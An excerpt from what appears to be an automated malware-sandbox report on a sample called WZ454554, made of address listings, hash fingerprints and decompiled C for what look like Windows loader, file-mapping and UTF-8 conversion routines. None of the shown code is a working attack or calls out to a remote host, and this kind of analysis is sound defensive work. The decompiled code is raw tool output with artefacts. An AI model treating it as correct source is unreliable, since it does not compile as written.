                            0x0041d691
                            0x0041d692
                            0x0041d693
                            0x0041d699
                            0x0041d699
                            0x0041d6ab
                            0x0041d6b6
                            0x0041d6bc
                            0x0041d6cf
                            0x0041d6d5
                            0x0041d6da
                            0x0041d6e3
                            0x0041d6eb
                            0x0041d6f2
                            0x0041d6f8
                            0x0041d703
                            0x0041d70f
                            0x0041d715
                            0x0041d71b
                            0x0041d727
                            0x0041d72d
                            0x0041d733
                            0x0041d739
                            0x0041d739
                            0x0041d73f
                            0x0041d746
                            0x0041d754
                            0x0041d766
                            0x0041d767
                            0x0041d768
                            0x0041d774
                            0x0041d77a
                            0x0041d77b
                            0x0041d788
                            0x0041d788
                            0x0041d78f
                            0x0041d797
                            0x0041d7a9
                            0x0041d7b0
                            0x0041d7b6
                            0x0041d7b7
                            0x0041d7bd
                            0x0041d7c7
                            0x0041d7c8
                            0x0041d7ce
                            0x0041d7cf
                            0x0041d7db
                            0x0041d7dc
                            0x0041d7e3
                            0x0041d7e4
                            0x0041d7ea
                            0x0041d7f4
                            0x0041d7fa
                            0x0041d7fc
                            0x0041d7fc
                            0x0041d80e
                            0x0041d813
                            0x0041d819
                            0x0041d820
                            0x0041d825
                            0x0041d82b
                            0x0041d831
                            0x0041d837
                            0x0041d83e
                            0x0041d844
                            0x0041d84a
                            0x0041d850
                            0x0041d850
                            0x0041d85c
                            0x0041d863
                            0x0041d86f
                            0x0041d87c
                            0x0041d883
                            0x0041d88f
                            0x0041d892
                            0x0041d893
                            0x0041d899
                            0x0041d8a0
                            0x0041d8a0
                            0x0041d8a0
                            0x0041d8a6
                            0x0041d8b0
                            0x0041d8b1
                            0x0041d8bd
                            0x0041d8c9
                            0x0041d8cf
                            0x0041d8e2
                            0x0041d8f0
                            0x0041d8f6
                            0x0041d8fd
                            0x0041d904
                            0x0041d90a
                            0x0041d910
                            0x0041d91c
                            0x0041d92b
                            0x0041d931
                            0x0041d934
                            0x0041d93a
                            0x0041d940
                            0x0041d942
                            0x0041d948
                            0x0041d94f
                            0x0041d955
                            0x0041d962
                            0x0041d962
                            0x0041d975

                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3e7c4938ffff8f74f9c64fe6e21da05337fb64f0d350af1bcf089ac8624cf5a
                            • Instruction ID: 217f023aa7cff1baf1242d0886c29aea4514c19c3d0dc8e23aee6c36421489f5
                            • Opcode Fuzzy Hash: d3e7c4938ffff8f74f9c64fe6e21da05337fb64f0d350af1bcf089ac8624cf5a
                            • Instruction Fuzzy Hash: F4D18472958B95CFCB16CF38DD9AA853FB2F342324708439EC9A1931A6D7312065DF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE513A, Relevance: .3, Instructions: 258COMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E00AE513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xbad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00AFD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00AD2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00AD4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00AFF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L00ACFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xbab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L00AFB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                            0x00ae5142
                            0x00ae514c
                            0x00ae5150
                            0x00ae5157
                            0x00ae5159
                            0x00ae515e
                            0x00ae5165
                            0x00ae5169
                            0x00ae516c
                            0x00ae5172
                            0x00ae5176
                            0x00ae517a
                            0x00ae517a
                            0x00ae517a
                            0x00ae517f
                            0x00b26d8b
                            0x00b26d8e
                            0x00b26d91
                            0x00b26d95
                            0x00b26d98
                            0x00b26d9c
                            0x00b26da0
                            0x00b26da3
                            0x00b26da7
                            0x00b26e26
                            0x00b26e26
                            0x00b26e2a
                            0x00ae51f9
                            0x00ae51f9
                            0x00ae51fe
                            0x00b26e33
                            0x00b26e33
                            0x00b26e39
                            0x00b26e3d
                            0x00b26e46
                            0x00b26e50
                            0x00000000
                            0x00000000
                            0x00b26e52
                            0x00b26e53
                            0x00b26e56
                            0x00b26e5d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b26e5f
                            0x00b26e67
                            0x00b26e77
                            0x00b26e7f
                            0x00b26e80
                            0x00b26e88
                            0x00b26e90
                            0x00b26e9f
                            0x00b26ea5
                            0x00b26ea9
                            0x00b26eb1
                            0x00b26ebf
                            0x00000000
                            0x00000000
                            0x00b26ecf
                            0x00b26ed3
                            0x00000000
                            0x00000000
                            0x00b26edb
                            0x00b26ede
                            0x00b26ee1
                            0x00b26ee8
                            0x00b26eeb
                            0x00b26eed
                            0x00b26ef0
                            0x00b26ef4
                            0x00b26ef8
                            0x00b26efc
                            0x00000000
                            0x00000000
                            0x00b26f0d
                            0x00b26f11
                            0x00b26f32
                            0x00b26f37
                            0x00b26f3b
                            0x00b26f3e
                            0x00b26f41
                            0x00b26f46
                            0x00000000
                            0x00000000
                            0x00b26f4c
                            0x00b26f50
                            0x00b26f50
                            0x00b26f54
                            0x00b26f62
                            0x00b26f65
                            0x00b26f6d
                            0x00b26f7b
                            0x00b26f7b
                            0x00b26f93
                            0x00b26f98
                            0x00b26fa0
                            0x00b26fa6
                            0x00b26fb3
                            0x00b26fb6
                            0x00b26fbf
                            0x00b26fc1
                            0x00b26fd5
                            0x00b26fda
                            0x00b26fda
                            0x00b26fdd
                            0x00b26fe2
                            0x00b26fe7
                            0x00b26feb
                            0x00b26fef
                            0x00b26ff3
                            0x00ae520c
                            0x00ae520c
                            0x00ae520f
                            0x00ae5215
                            0x00ae5234
                            0x00ae523a
                            0x00ae523a
                            0x00ae5244
                            0x00ae5245
                            0x00ae5246
                            0x00ae5251
                            0x00ae5251
                            0x00b26f13
                            0x00b26f17
                            0x00b26f17
                            0x00b26f18
                            0x00b26f1b
                            0x00b26f1f
                            0x00b26f23
                            0x00000000
                            0x00b26f28
                            0x00ae5204
                            0x00ae5204
                            0x00ae5208
                            0x00000000
                            0x00ae5208
                            0x00ae5185
                            0x00ae5188
                            0x00ae518a
                            0x00ae518e
                            0x00ae5195
                            0x00b26db1
                            0x00b26db5
                            0x00b26db9
                            0x00ae519b
                            0x00ae519b
                            0x00ae519e
                            0x00ae51a7
                            0x00ae51a9
                            0x00ae51a9
                            0x00ae51b5
                            0x00ae51b8
                            0x00ae51bb
                            0x00ae51be
                            0x00ae51c1
                            0x00ae51c5
                            0x00ae51c9
                            0x00ae51cd
                            0x00ae51cd
                            0x00ae51d8
                            0x00ae51dc
                            0x00ae51e0
                            0x00b26dcc
                            0x00b26dd0
                            0x00b26dd5
                            0x00b26ddd
                            0x00b26de1
                            0x00b26de1
                            0x00b26de5
                            0x00b26deb
                            0x00b26df1
                            0x00b26df7
                            0x00b26dfd
                            0x00b26e01
                            0x00b26e05
                            0x00b26e09
                            0x00b26e0d
                            0x00b26e11
                            0x00b26e11
                            0x00ae51eb
                            0x00b26e1a
                            0x00b26e1f
                            0x00b26e21
                            0x00b26e23
                            0x00000000
                            0x00ae51f1
                            0x00ae51f1
                            0x00000000
                            0x00ae51f1

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69652367d8e46f3d6aabd52a91eaa61e338b0bf5f2d34b2b80d1ea96ceb8ed72
                            • Instruction ID: 27f1c4a1f8e5e7b7d63d174b3ed18586d1739cc96663b06d9a20908cb584a958
                            • Opcode Fuzzy Hash: 69652367d8e46f3d6aabd52a91eaa61e338b0bf5f2d34b2b80d1ea96ceb8ed72
                            • Instruction Fuzzy Hash: C4C10F755083808FD754CF28D580A6AFBF1BF88308F144AAEF9998B352D771E945CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE03E2, Relevance: .3, Instructions: 254COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00AE03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xbad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(L00AE0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L00AFB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00ACB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xba7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(L00AD7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = L00AD7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E00B37016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00AF9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00B369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xba7c04 != 0) {
						_t118 = _v12;
						_t120 = L00B3A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xba7bd8;
						if( *0xba7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00AF95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00AF99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = L00B33540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00ABB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00AFAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xba8474 - 3;
										if( *0xba8474 != 3) {
											 *0xba79dc =  *0xba79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(L00AD7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = L00AD7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00B37016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xba8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xba7b00; // 0x0
							asm("ror esi, cl");
							 *0xbab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00AF95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L00AC7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                            0x00ae03f1
                            0x00ae03f7
                            0x00ae03f9
                            0x00ae03fb
                            0x00ae03fd
                            0x00ae0400
                            0x00ae040a
                            0x00b24c7a
                            0x00ae0537
                            0x00ae0547
                            0x00ae0410
                            0x00ae0410
                            0x00ae0414
                            0x00ae0417
                            0x00ae041a
                            0x00ae0421
                            0x00ae0424
                            0x00ae042b
                            0x00ae043b
                            0x00ae043e
                            0x00ae043f
                            0x00ae043f
                            0x00ae0446
                            0x00ae0449
                            0x00ae044c
                            0x00ae044f
                            0x00ae0459
                            0x00b24c8d
                            0x00ae045f
                            0x00ae045f
                            0x00ae045f
                            0x00ae0467
                            0x00b24c97
                            0x00b24c9d
                            0x00b24ca4
                            0x00b24caa
                            0x00b24caf
                            0x00b24cb1
                            0x00b24cc3
                            0x00b24cb3
                            0x00b24cbc
                            0x00b24cbc
                            0x00b24cc8
                            0x00b24ccb
                            0x00b24cd7
                            0x00b24cda
                            0x00b24cdf
                            0x00b24cdf
                            0x00b24ccb
                            0x00b24ca4
                            0x00ae046d
                            0x00ae046f
                            0x00ae046f
                            0x00ae0471
                            0x00ae0476
                            0x00ae047a
                            0x00ae047b
                            0x00ae0483
                            0x00ae0489
                            0x00ae048d
                            0x00000000
                            0x00000000
                            0x00b24ce9
                            0x00b24cef
                            0x00b24d22
                            0x00b24d22
                            0x00000000
                            0x00b24d22
                            0x00b24cf1
                            0x00b24cf7
                            0x00000000
                            0x00000000
                            0x00b24cf9
                            0x00b24cff
                            0x00000000
                            0x00000000
                            0x00b24d05
                            0x00b24d07
                            0x00000000
                            0x00000000
                            0x00b24d0d
                            0x00b24d0f
                            0x00b24d14
                            0x00b24d16
                            0x00000000
                            0x00000000
                            0x00b24d1c
                            0x00b24d1c
                            0x00ae0499
                            0x00ae0535
                            0x00ae0535
                            0x00000000
                            0x00ae0535
                            0x00ae04a6
                            0x00b24d2c
                            0x00b24d37
                            0x00b24d39
                            0x00b24d3b
                            0x00000000
                            0x00000000
                            0x00b24d41
                            0x00b24d48
                            0x00ae0527
                            0x00ae052b
                            0x00ae052d
                            0x00ae0530
                            0x00ae0530
                            0x00000000
                            0x00ae052b
                            0x00b24d4e
                            0x00ae04ac
                            0x00ae04ac
                            0x00ae04af
                            0x00ae04b2
                            0x00ae04b7
                            0x00ae04b9
                            0x00ae04bb
                            0x00ae04bd
                            0x00ae04bf
                            0x00ae04c5
                            0x00ae04c9
                            0x00b24d53
                            0x00b24d59
                            0x00b24db9
                            0x00b24dba
                            0x00b24dbf
                            0x00b24dc2
                            0x00b24dc4
                            0x00b24dc7
                            0x00b24dce
                            0x00000000
                            0x00b24dce
                            0x00b24d5b
                            0x00b24d61
                            0x00000000
                            0x00000000
                            0x00b24d63
                            0x00b24d69
                            0x00000000
                            0x00000000
                            0x00b24d6b
                            0x00b24d6e
                            0x00b24d74
                            0x00b24d76
                            0x00b24d7c
                            0x00b24d7e
                            0x00b24d84
                            0x00b24d89
                            0x00b24d8c
                            0x00b24d8d
                            0x00b24d92
                            0x00b24d95
                            0x00b24d96
                            0x00b24d98
                            0x00b24d9a
                            0x00b24d9f
                            0x00b24da4
                            0x00b24da6
                            0x00b24da8
                            0x00b24daf
                            0x00b24db1
                            0x00b24db1
                            0x00b24daf
                            0x00b24da6
                            0x00b24d84
                            0x00b24d7c
                            0x00000000
                            0x00b24d74
                            0x00ae04d6
                            0x00b24de1
                            0x00ae04dc
                            0x00ae04dc
                            0x00ae04dc
                            0x00ae04e4
                            0x00b24deb
                            0x00b24df1
                            0x00b24df8
                            0x00b24dfe
                            0x00b24e03
                            0x00b24e05
                            0x00b24e17
                            0x00b24e07
                            0x00b24e10
                            0x00b24e10
                            0x00b24e1c
                            0x00b24e1f
                            0x00b24e35
                            0x00b24e35
                            0x00b24e1f
                            0x00b24df8
                            0x00ae04f1
                            0x00ae04fa
                            0x00b24e3f
                            0x00b24e47
                            0x00b24e5b
                            0x00b24e61
                            0x00b24e67
                            0x00b24e69
                            0x00b24e71
                            0x00b24e73
                            0x00ae0500
                            0x00ae0500
                            0x00ae0500
                            0x00ae04fa
                            0x00ae0508
                            0x00ae051d
                            0x00ae051d
                            0x00ae051f
                            0x00ae0524
                            0x00000000
                            0x00ae0524
                            0x00ae0515
                            0x00ae0517
                            0x00b24e7a
                            0x00b24e7c
                            0x00000000
                            0x00000000
                            0x00b24e85
                            0x00000000
                            0x00b24e85
                            0x00000000
                            0x00ae0517

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0dcfce6d33770205670c90a2d2aa76ff7cbf4808fa28071fecaa27651985df51
                            • Instruction ID: 55edc8944c362a0971c30c566cd36c7effeb95f163ee0c8cc3dd1c8b3698da06
                            • Opcode Fuzzy Hash: 0dcfce6d33770205670c90a2d2aa76ff7cbf4808fa28071fecaa27651985df51
                            • Instruction Fuzzy Hash: 5D917831E00264AFEB219B69DD45FBE77F0EB01720F1502A1FA15AB6D1DBB49C80CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEEBB0, Relevance: .2, Instructions: 250COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AEEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = L00AEED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
